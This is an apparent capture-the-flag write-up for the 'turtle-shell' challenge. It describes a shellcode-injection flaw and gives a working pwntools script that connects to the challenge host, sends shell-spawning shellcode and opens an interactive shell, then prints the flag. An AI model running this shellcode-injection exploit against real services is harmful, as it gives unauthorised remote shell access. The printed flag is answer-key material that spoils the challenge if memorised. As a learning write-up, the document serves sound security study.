Description
A turtle without it's shell is a sad sight to see
Connect via: nc turtle.sdc.tf 1337
Its a simple and straight forward shellcode injection, it can be implied from the name and the fact that none of the protection is enabled.
The program simply takes our input and runs it as code, we can use pwntools's shellcraft to spawn a shell
#!user/bin/python3
from pwn import *
# =========================================================
# SETUP
# =========================================================
exe = './turtle-shell'
context.binary = ELF(exe, checksec=True)
context.log_level = 'debug'
local = False
if(local):
io = process(exe)
else:
io = remote('turtle.sdc.tf', 1337)
# =========================================================
# ADDRESSES
# =========================================================
# =========================================================
# EXPLOITS
# =========================================================
shellcode = asm(shellcraft.sh())
# flattening payload here
payload = flat([
shellcode,
])
io.sendline(payload)
io.interactive()
sdctf{w0w_y0u_m4d3_7h3_7urT13_c0m3_0u7_0f_1t5_5h3l1}
